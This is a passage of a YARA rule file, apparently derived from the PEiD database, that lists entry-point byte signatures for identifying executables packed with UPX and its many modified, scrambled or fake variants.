8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 99 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 FC 01 00 00 83 CD FF 31 DB EB 0C 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_123_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 33 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B3 01 00 00 EB 0A 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PackerUPX_CompresorGratuito_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? 
FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE EF 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B1 01 00 00 EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 
BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 EB EA EB FC 8A 06 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 
33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? 
C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_v10_CyberDoom_Team_X: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_120_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_124_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 34 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n        $b = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXHiT_v001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v060_v061: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 F0 01 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_293_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? 
FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 D8 01 00 00 83 CD FF 31 DB 90 90 90 90 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 90 90 B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 
00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? 
?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_102_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_030_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 04 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? 
E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = {}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 1A 00 00 00 8D BE E6 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Delphi_stub_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 32 2E 30 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n        $b = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 
